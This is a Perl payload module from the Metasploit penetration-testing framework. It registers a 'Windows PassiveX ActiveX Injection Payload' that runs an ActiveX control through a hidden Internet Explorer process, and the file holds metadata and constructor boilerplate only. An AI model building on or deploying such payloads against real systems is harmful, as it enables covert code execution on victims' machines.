##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Payload::win32_passivex;
use strict;
use base 'Msf::PayloadComponent::Windows::ia32::PassiveXStager';
my $info =
{
'Name' => 'Windows PassiveX ActiveX Injection Payload',
'Version' => '$Revision: 2011 $',
'Description' => 'Executes an ActiveX control via a hidden IEXPLORE.EXE',
'Multistage' => 0,
'Authors' => [ 'skape <mmiller [at] hick.org>', ],
'UserOpts' =>
{
},
};
sub _Load
{
__PACKAGE__->SUPER::_Load();
}
sub new
{
my $class = shift;
my $hash = @_ ? shift : { };
my $self;
_Load();
$hash = $class->MergeHashRec($hash, {'Info' => $info});
$self = $class->SUPER::new($hash, @_);
return($self);
}
1;